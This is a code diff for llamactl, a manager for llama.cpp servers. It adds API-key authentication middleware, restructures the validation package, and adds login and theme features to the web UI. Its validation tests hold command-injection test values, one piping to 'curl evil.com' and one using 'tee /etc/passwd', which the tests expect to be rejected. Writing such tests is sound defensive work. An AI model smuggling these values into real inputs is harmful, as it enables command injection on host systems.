middleware := server.NewAPIAuthMiddleware(cfg)
// Test inference behavior if inference auth is required
if tt.requireInference {
req := httptest.NewRequest("GET", "/v1/models", nil)
recorder := httptest.NewRecorder()
handler := middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler.ServeHTTP(recorder, req)
// Should always be unauthorized without a key (since middleware assumes auth is required)
if recorder.Code != http.StatusUnauthorized {
t.Errorf("Expected unauthorized for inference without key, got status %v", recorder.Code)
}
}
// Test management behavior if management auth is required
if tt.requireManagement {
req := httptest.NewRequest("GET", "/api/v1/instances", nil)
recorder := httptest.NewRecorder()
handler := middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler.ServeHTTP(recorder, req)
// Should always be unauthorized without a key (since middleware assumes auth is required)
if recorder.Code != http.StatusUnauthorized {
t.Errorf("Expected unauthorized for management without key, got status %v", recorder.Code)
}
}
})
}
}

View File

@@ -1,4 +1,4 @@
package llamactl package server
type OpenAIListInstancesResponse struct { type OpenAIListInstancesResponse struct {
Object string `json:"object"` Object string `json:"object"`

View File

@@ -1,4 +1,4 @@
package llamactl package server
import ( import (
"fmt" "fmt"
@@ -8,7 +8,7 @@ import (
"github.com/go-chi/cors" "github.com/go-chi/cors"
httpSwagger "github.com/swaggo/http-swagger" httpSwagger "github.com/swaggo/http-swagger"
_ "llamactl/docs" _ "llamactl/apidocs"
"llamactl/webui" "llamactl/webui"
) )
@@ -18,7 +18,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
// Add CORS middleware // Add CORS middleware
r.Use(cors.Handler(cors.Options{ r.Use(cors.Handler(cors.Options{
AllowedOrigins: handler.config.Server.AllowedOrigins, AllowedOrigins: handler.cfg.Server.AllowedOrigins,
AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"}, AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"}, AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
ExposedHeaders: []string{"Link"}, ExposedHeaders: []string{"Link"},
@@ -26,16 +26,28 @@ func SetupRouter(handler *Handler) *chi.Mux {
MaxAge: 300, MaxAge: 300,
})) }))
r.Get("/swagger/*", httpSwagger.Handler( // Add API authentication middleware
httpSwagger.URL("/swagger/doc.json"), authMiddleware := NewAPIAuthMiddleware(handler.cfg.Auth)
))
if handler.cfg.Server.EnableSwagger {
r.Get("/swagger/*", httpSwagger.Handler(
httpSwagger.URL("/swagger/doc.json"),
))
}
// Define routes // Define routes
r.Route("/api/v1", func(r chi.Router) { r.Route("/api/v1", func(r chi.Router) {
if authMiddleware != nil && handler.cfg.Auth.RequireManagementAuth {
r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
}
r.Get("/version", handler.VersionHandler()) // Get server version
r.Route("/server", func(r chi.Router) { r.Route("/server", func(r chi.Router) {
r.Get("/help", handler.HelpHandler()) r.Get("/help", handler.LlamaServerHelpHandler())
r.Get("/version", handler.VersionHandler()) r.Get("/version", handler.LlamaServerVersionHandler())
r.Get("/devices", handler.ListDevicesHandler()) r.Get("/devices", handler.LlamaServerListDevicesHandler())
}) })
// Instance management endpoints // Instance management endpoints
@@ -61,17 +73,25 @@ func SetupRouter(handler *Handler) *chi.Mux {
}) })
}) })
r.Get(("/v1/models"), handler.OpenAIListInstances()) // List instances in OpenAI-compatible format r.Route(("/v1"), func(r chi.Router) {
// OpenAI-compatible proxy endpoint if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
// Handles all POST requests to /v1/*, including: r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
// - /v1/completions }
// - /v1/chat/completions
// - /v1/embeddings r.Get(("/models"), handler.OpenAIListInstances()) // List instances in OpenAI-compatible format
// - /v1/rerank
// - /v1/reranking // OpenAI-compatible proxy endpoint
// The instance/model to use is determined by the request body. // Handles all POST requests to /v1/*, including:
r.Post("/v1/*", handler.OpenAIProxy()) // - /v1/completions
// - /v1/chat/completions
// - /v1/embeddings
// - /v1/rerank
// - /v1/reranking
// The instance/model to use is determined by the request body.
r.Post("/*", handler.OpenAIProxy())
})
// Serve WebUI files // Serve WebUI files
if err := webui.SetupWebUI(r); err != nil { if err := webui.SetupWebUI(r); err != nil {

10
pkg/testutil/helpers.go Normal file
View File

@@ -0,0 +1,10 @@
package testutil
// Helper functions for pointer fields
func BoolPtr(b bool) *bool {
return &b
}
func IntPtr(i int) *int {
return &i
}

View File

@@ -1,7 +1,9 @@
package llamactl package validation
import ( import (
"fmt" "fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"reflect" "reflect"
"regexp" "regexp"
) )
@@ -32,20 +34,35 @@ func validateStringForInjection(value string) error {
return nil return nil
} }
// ValidateInstanceOptions performs minimal security validation // ValidateInstanceOptions performs validation based on backend type
func ValidateInstanceOptions(options *CreateInstanceOptions) error { func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil { if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil")) return ValidationError(fmt.Errorf("options cannot be nil"))
} }
// Validate based on backend type
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
return validateLlamaCppOptions(options)
default:
return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
}
}
// validateLlamaCppOptions validates llama.cpp specific options
func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
if options.LlamaServerOptions == nil {
return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
}
// Use reflection to check all string fields for injection patterns // Use reflection to check all string fields for injection patterns
if err := validateStructStrings(&options.LlamaServerOptions, ""); err != nil { if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
return err return err
} }
// Basic network validation - only check for reasonable ranges // Basic network validation for port
if options.Port < 0 || options.Port > 65535 { if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range")) return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
} }
return nil return nil
@@ -101,16 +118,16 @@ func validateStructStrings(v any, fieldPath string) error {
return nil return nil
} }
func ValidateInstanceName(name string) error { func ValidateInstanceName(name string) (string, error) {
// Validate instance name // Validate instance name
if name == "" { if name == "" {
return ValidationError(fmt.Errorf("name cannot be empty")) return "", ValidationError(fmt.Errorf("name cannot be empty"))
} }
if !validNamePattern.MatchString(name) { if !validNamePattern.MatchString(name) {
return ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)")) return "", ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
} }
if len(name) > 50 { if len(name) > 50 {
return ValidationError(fmt.Errorf("name too long (max 50 characters)")) return "", ValidationError(fmt.Errorf("name too long (max 50 characters)"))
} }
return nil return name, nil
} }

View File

@@ -1,10 +1,13 @@
package llamactl_test package validation_test
import ( import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"llamactl/pkg/validation"
"strings" "strings"
"testing" "testing"
llamactl "llamactl/pkg"
) )
func TestValidateInstanceName(t *testing.T) { func TestValidateInstanceName(t *testing.T) {
@@ -39,16 +42,23 @@ func TestValidateInstanceName(t *testing.T) {
for _, tt := range tests { for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
err := llamactl.ValidateInstanceName(tt.input) name, err := validation.ValidateInstanceName(tt.input)
if (err != nil) != tt.wantErr { if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr) t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
} }
if tt.wantErr {
return // Skip further checks if we expect an error
}
// If no error, check that the name is returned as expected
if name != tt.input {
t.Errorf("ValidateInstanceName(%q) = %q, want %q", tt.input, name, tt.input)
}
}) })
} }
} }
func TestValidateInstanceOptions_NilOptions(t *testing.T) { func TestValidateInstanceOptions_NilOptions(t *testing.T) {
err := llamactl.ValidateInstanceOptions(nil) err := validation.ValidateInstanceOptions(nil)
if err == nil { if err == nil {
t.Error("Expected error for nil options") t.Error("Expected error for nil options")
} }
@@ -73,13 +83,14 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests { for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
options := &llamactl.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: tt.port, Port: tt.port,
}, },
} }
err := llamactl.ValidateInstanceOptions(options) err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr { if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr) t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
} }
@@ -126,13 +137,14 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
for _, tt := range tests { for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field) // Test with Model field (string field)
options := &llamactl.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: tt.value, Model: tt.value,
}, },
} }
err := llamactl.ValidateInstanceOptions(options) err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr { if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr) t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
} }
@@ -163,13 +175,14 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
for _, tt := range tests { for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field) // Test with Lora field (array field)
options := &llamactl.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Lora: tt.array, Lora: tt.array,
}, },
} }
err := llamactl.ValidateInstanceOptions(options) err := validation.ValidateInstanceOptions(options)
if (err != nil) != tt.wantErr { if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr) t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
} }
@@ -181,13 +194,14 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
// Test that injection in any field is caught // Test that injection in any field is caught
tests := []struct { tests := []struct {
name string name string
options *llamactl.CreateInstanceOptions options *instance.CreateInstanceOptions
wantErr bool wantErr bool
}{ }{
{ {
name: "injection in model field", name: "injection in model field",
options: &llamactl.CreateInstanceOptions{ options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf", Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com", HFRepo: "microsoft/model; curl evil.com",
}, },
@@ -196,8 +210,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
}, },
{ {
name: "injection in log file", name: "injection in log file",
options: &llamactl.CreateInstanceOptions{ options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf", Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd", LogFile: "/tmp/log.txt | tee /etc/passwd",
}, },
@@ -206,8 +221,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
}, },
{ {
name: "all safe fields", name: "all safe fields",
options: &llamactl.CreateInstanceOptions{ options: &instance.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium", HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log", LogFile: "/tmp/llama.log",
@@ -221,7 +237,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
for _, tt := range tests { for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
err := llamactl.ValidateInstanceOptions(tt.options) err := validation.ValidateInstanceOptions(tt.options)
if (err != nil) != tt.wantErr { if (err != nil) != tt.wantErr {
t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr) t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
} }
@@ -231,11 +247,12 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
func TestValidateInstanceOptions_NonStringFields(t *testing.T) { func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
// Test that non-string fields don't interfere with validation // Test that non-string fields don't interfere with validation
options := &llamactl.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
AutoRestart: boolPtr(true), AutoRestart: testutil.BoolPtr(true),
MaxRestarts: intPtr(5), MaxRestarts: testutil.IntPtr(5),
RestartDelay: intPtr(10), RestartDelay: testutil.IntPtr(10),
LlamaServerOptions: llamactl.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: 8080, Port: 8080,
GPULayers: 32, GPULayers: 32,
CtxSize: 4096, CtxSize: 4096,
@@ -247,17 +264,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
}, },
} }
err := llamactl.ValidateInstanceOptions(options) err := validation.ValidateInstanceOptions(options)
if err != nil { if err != nil {
t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err) t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
} }
} }
// Helper functions for pointer fields
func boolPtr(b bool) *bool {
return &b
}
func intPtr(i int) *int {
return &i
}

View File

@@ -1,12 +1,16 @@
import { useState } from "react"; import { useState } from "react";
import Header from "@/components/Header"; import Header from "@/components/Header";
import InstanceList from "@/components/InstanceList"; import InstanceList from "@/components/InstanceList";
import InstanceModal from "@/components/InstanceModal"; import InstanceDialog from "@/components/InstanceDialog";
import LoginDialog from "@/components/LoginDialog";
import SystemInfoDialog from "./components/SystemInfoDialog";
import { type CreateInstanceOptions, type Instance } from "@/types/instance"; import { type CreateInstanceOptions, type Instance } from "@/types/instance";
import { useInstances } from "@/contexts/InstancesContext"; import { useInstances } from "@/contexts/InstancesContext";
import SystemInfoModal from "./components/SystemInfoModal"; import { useAuth } from "@/contexts/AuthContext";
import { ThemeProvider } from "@/contexts/ThemeContext";
function App() { function App() {
const { isAuthenticated, isLoading: authLoading } = useAuth();
const [isInstanceModalOpen, setIsInstanceModalOpen] = useState(false); const [isInstanceModalOpen, setIsInstanceModalOpen] = useState(false);
const [isSystemInfoModalOpen, setIsSystemInfoModalOpen] = useState(false); const [isSystemInfoModalOpen, setIsSystemInfoModalOpen] = useState(false);
const [editingInstance, setEditingInstance] = useState<Instance | undefined>( const [editingInstance, setEditingInstance] = useState<Instance | undefined>(
@@ -26,9 +30,9 @@ function App() {
const handleSaveInstance = (name: string, options: CreateInstanceOptions) => { const handleSaveInstance = (name: string, options: CreateInstanceOptions) => {
if (editingInstance) { if (editingInstance) {
updateInstance(editingInstance.name, options); void updateInstance(editingInstance.name, options);
} else { } else {
createInstance(name, options); void createInstance(name, options);
} }
}; };
@@ -36,26 +40,54 @@ function App() {
setIsSystemInfoModalOpen(true); setIsSystemInfoModalOpen(true);
}; };
// Show loading spinner while checking auth
if (authLoading) {
return (
<ThemeProvider>
<div className="min-h-screen bg-background flex items-center justify-center">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
<p className="text-muted-foreground">Loading...</p>
</div>
</div>
</ThemeProvider>
);
}
// Show login dialog if not authenticated
if (!isAuthenticated) {
return (
<ThemeProvider>
<div className="min-h-screen bg-background">
<LoginDialog open={true} />
</div>
</ThemeProvider>
);
}
// Show main app if authenticated
return ( return (
<div className="min-h-screen bg-gray-50"> <ThemeProvider>
<Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} /> <div className="min-h-screen bg-background">
<main className="container mx-auto max-w-4xl px-4 py-8"> <Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
<InstanceList editInstance={handleEditInstance} /> <main className="container mx-auto max-w-4xl px-4 py-8">
</main> <InstanceList editInstance={handleEditInstance} />
</main>
<InstanceModal <InstanceDialog
open={isInstanceModalOpen} open={isInstanceModalOpen}
onOpenChange={setIsInstanceModalOpen} onOpenChange={setIsInstanceModalOpen}
onSave={handleSaveInstance} onSave={handleSaveInstance}
instance={editingInstance} instance={editingInstance}
/> />
<SystemInfoModal <SystemInfoDialog
open={isSystemInfoModalOpen} open={isSystemInfoModalOpen}
onOpenChange={setIsSystemInfoModalOpen} onOpenChange={setIsSystemInfoModalOpen}
/> />
</div> </div>
</ThemeProvider>
); );
} }
export default App; export default App;

View File

@@ -1,10 +1,12 @@
import { describe, it, expect, vi, beforeEach } from 'vitest' import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
import { render, screen, waitFor } from '@testing-library/react' import { render, screen, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event' import userEvent from '@testing-library/user-event'
import App from '@/App' import App from '@/App'
import { InstancesProvider } from '@/contexts/InstancesContext' import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api' import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance' import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API // Mock the API
vi.mock('@/lib/api', () => ({ vi.mock('@/lib/api', () => ({
@@ -35,21 +37,44 @@ vi.mock('@/lib/healthService', () => ({
function renderApp() { function renderApp() {
return render( return render(
<InstancesProvider> <AuthProvider>
<App /> <InstancesProvider>
</InstancesProvider> <App />
</InstancesProvider>
</AuthProvider>
) )
} }
describe('App Component - Critical Business Logic Only', () => { describe('App Component - Critical Business Logic Only', () => {
const mockInstances: Instance[] = [ const mockInstances: Instance[] = [
{ name: 'test-instance-1', running: false, options: { model: 'model1.gguf' } }, { name: 'test-instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'test-instance-2', running: true, options: { model: 'model2.gguf' } } { name: 'test-instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } }
] ]
beforeEach(() => { beforeEach(() => {
vi.clearAllMocks() vi.clearAllMocks()
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances) vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
// Mock window.matchMedia for dark mode functionality
Object.defineProperty(window, 'matchMedia', {
writable: true,
value: vi.fn().mockImplementation((query: string) => ({
matches: false,
media: query,
onchange: null,
addListener: vi.fn(),
removeListener: vi.fn(),
addEventListener: vi.fn(),
removeEventListener: vi.fn(),
dispatchEvent: vi.fn(),
})),
})
})
afterEach(() => {
vi.restoreAllMocks()
}) })
describe('End-to-End Instance Management', () => { describe('End-to-End Instance Management', () => {
@@ -57,8 +82,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup() const user = userEvent.setup()
const newInstance: Instance = { const newInstance: Instance = {
name: 'new-test-instance', name: 'new-test-instance',
running: false, status: 'stopped',
options: { model: 'new-model.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'new-model.gguf' } }
} }
vi.mocked(instancesApi.create).mockResolvedValue(newInstance) vi.mocked(instancesApi.create).mockResolvedValue(newInstance)
@@ -75,12 +100,13 @@ describe('App Component - Critical Business Logic Only', () => {
const nameInput = screen.getByLabelText(/Instance Name/) const nameInput = screen.getByLabelText(/Instance Name/)
await user.type(nameInput, 'new-test-instance') await user.type(nameInput, 'new-test-instance')
await user.click(screen.getByTestId('modal-save-button')) await user.click(screen.getByTestId('dialog-save-button'))
// Verify correct API call // Verify correct API call
await waitFor(() => { await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', { expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', {
auto_restart: true, // Default value auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
}) })
}) })
@@ -94,8 +120,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup() const user = userEvent.setup()
const updatedInstance: Instance = { const updatedInstance: Instance = {
name: 'test-instance-1', name: 'test-instance-1',
running: false, status: 'stopped',
options: { model: 'updated-model.gguf' } options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'updated-model.gguf' } }
} }
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance) vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance)
@@ -109,12 +135,13 @@ describe('App Component - Critical Business Logic Only', () => {
const editButtons = screen.getAllByTitle('Edit instance') const editButtons = screen.getAllByTitle('Edit instance')
await user.click(editButtons[0]) await user.click(editButtons[0])
await user.click(screen.getByTestId('modal-save-button')) await user.click(screen.getByTestId('dialog-save-button'))
// Verify correct API call with existing instance data // Verify correct API call with existing instance data
await waitFor(() => { await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', { expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', {
model: "model1.gguf", // Pre-filled from existing instance backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "model1.gguf" } // Pre-filled from existing instance
}) })
}) })
}) })
@@ -167,7 +194,6 @@ describe('App Component - Critical Business Logic Only', () => {
renderApp() renderApp()
// App should still render and show error // App should still render and show error
expect(screen.getByText('Llamactl Dashboard')).toBeInTheDocument()
await waitFor(() => { await waitFor(() => {
expect(screen.getByText('Error loading instances')).toBeInTheDocument() expect(screen.getByText('Error loading instances')).toBeInTheDocument()
}) })

View File

@@ -0,0 +1,123 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox'
import type { BackendOptions } from '@/schemas/instanceOptions'
import { getBackendFieldType, basicBackendFieldsConfig } from '@/lib/zodFormUtils'
interface BackendFormFieldProps {
fieldKey: keyof BackendOptions
value: string | number | boolean | string[] | undefined
onChange: (key: string, value: string | number | boolean | string[] | undefined) => void
}
const BackendFormField: React.FC<BackendFormFieldProps> = ({ fieldKey, value, onChange }) => {
// Get configuration for basic fields, or use field name for advanced fields
const config = basicBackendFieldsConfig[fieldKey as string] || { label: fieldKey }
// Get type from Zod schema
const fieldType = getBackendFieldType(fieldKey)
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey as string, newValue)
}
const renderField = () => {
switch (fieldType) {
case 'boolean':
return (
<div className="flex items-center space-x-2">
<Checkbox
id={fieldKey}
checked={typeof value === 'boolean' ? value : false}
onCheckedChange={(checked) => handleChange(checked)}
/>
<Label htmlFor={fieldKey} className="text-sm font-normal">
{config.label}
{config.description && (
<span className="text-muted-foreground ml-1">- {config.description}</span>
)}
</Label>
</div>
)
case 'number':
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="number"
step="any" // This allows decimal numbers
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => {
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
// Only update if the parsed value is valid or the input is empty
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
handleChange(numValue)
}
}}
placeholder={config.placeholder}
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
case 'array':
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={Array.isArray(value) ? value.join(', ') : ''}
onChange={(e) => {
const arrayValue = e.target.value
? e.target.value.split(',').map(s => s.trim()).filter(Boolean)
: undefined
handleChange(arrayValue)
}}
placeholder="item1, item2, item3"
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
<p className="text-xs text-muted-foreground">Separate multiple values with commas</p>
</div>
)
case 'text':
default:
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => handleChange(e.target.value || undefined)}
placeholder={config.placeholder}
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
}
}
return <div className="space-y-2">{renderField()}</div>
}
export default BackendFormField

View File

@@ -1,5 +1,7 @@
import { Button } from "@/components/ui/button"; import { Button } from "@/components/ui/button";
import { HelpCircle } from "lucide-react"; import { HelpCircle, LogOut, Moon, Sun } from "lucide-react";
import { useAuth } from "@/contexts/AuthContext";
import { useTheme } from "@/contexts/ThemeContext";
interface HeaderProps { interface HeaderProps {
onCreateInstance: () => void; onCreateInstance: () => void;
@@ -7,16 +9,37 @@ interface HeaderProps {
} }
function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) { function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
const { logout } = useAuth();
const { theme, toggleTheme } = useTheme();
const handleLogout = () => {
if (confirm("Are you sure you want to logout?")) {
logout();
}
};
return ( return (
<header className="bg-white border-b border-gray-200"> <header className="bg-card border-b border-border">
<div className="container mx-auto max-w-4xl px-4 py-4"> <div className="container mx-auto max-w-4xl px-4 py-4">
<div className="flex items-center justify-between"> <div className="flex items-center justify-between">
<h1 className="text-2xl font-bold text-gray-900"> <h1 className="text-2xl font-bold text-foreground">
Llamactl Dashboard Llamactl Dashboard
</h1> </h1>
<div className="flex items-center gap-2"> <div className="flex items-center gap-2">
<Button onClick={onCreateInstance} data-testid="create-instance-button">Create Instance</Button> <Button onClick={onCreateInstance} data-testid="create-instance-button">
Create Instance
</Button>
<Button
variant="outline"
size="icon"
onClick={toggleTheme}
data-testid="theme-toggle-button"
title={`Switch to ${theme === 'light' ? 'dark' : 'light'} mode`}
>
{theme === 'light' ? <Moon className="h-4 w-4" /> : <Sun className="h-4 w-4" />}
</Button>
<Button <Button
variant="outline" variant="outline"
@@ -27,6 +50,16 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
> >
<HelpCircle className="h-4 w-4" /> <HelpCircle className="h-4 w-4" />
</Button> </Button>
<Button
variant="outline"
size="icon"
onClick={handleLogout}
data-testid="logout-button"
title="Logout"
>
<LogOut className="h-4 w-4" />
</Button>
</div> </div>
</div> </div>
</div> </div>
@@ -34,4 +67,4 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
); );
} }
export default Header; export default Header;

View File

@@ -27,6 +27,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return <XCircle className="h-3 w-3" />; return <XCircle className="h-3 w-3" />;
case "unknown": case "unknown":
return <Loader2 className="h-3 w-3 animate-spin" />; return <Loader2 className="h-3 w-3 animate-spin" />;
case "failed":
return <XCircle className="h-3 w-3" />;
} }
}; };
@@ -40,6 +42,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "destructive"; return "destructive";
case "unknown": case "unknown":
return "secondary"; return "secondary";
case "failed":
return "destructive";
} }
}; };
@@ -53,6 +57,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "Error"; return "Error";
case "unknown": case "unknown":
return "Unknown"; return "Unknown";
case "failed":
return "Failed";
} }
}; };

View File

@@ -3,7 +3,7 @@ import { Button } from "@/components/ui/button";
import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card"; import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
import type { Instance } from "@/types/instance"; import type { Instance } from "@/types/instance";
import { Edit, FileText, Play, Square, Trash2 } from "lucide-react"; import { Edit, FileText, Play, Square, Trash2 } from "lucide-react";
import LogsModal from "@/components/LogModal"; import LogsDialog from "@/components/LogDialog";
import HealthBadge from "@/components/HealthBadge"; import HealthBadge from "@/components/HealthBadge";
import { useState } from "react"; import { useState } from "react";
import { useInstanceHealth } from "@/hooks/useInstanceHealth"; import { useInstanceHealth } from "@/hooks/useInstanceHealth";
@@ -24,7 +24,7 @@ function InstanceCard({
editInstance, editInstance,
}: InstanceCardProps) { }: InstanceCardProps) {
const [isLogsOpen, setIsLogsOpen] = useState(false); const [isLogsOpen, setIsLogsOpen] = useState(false);
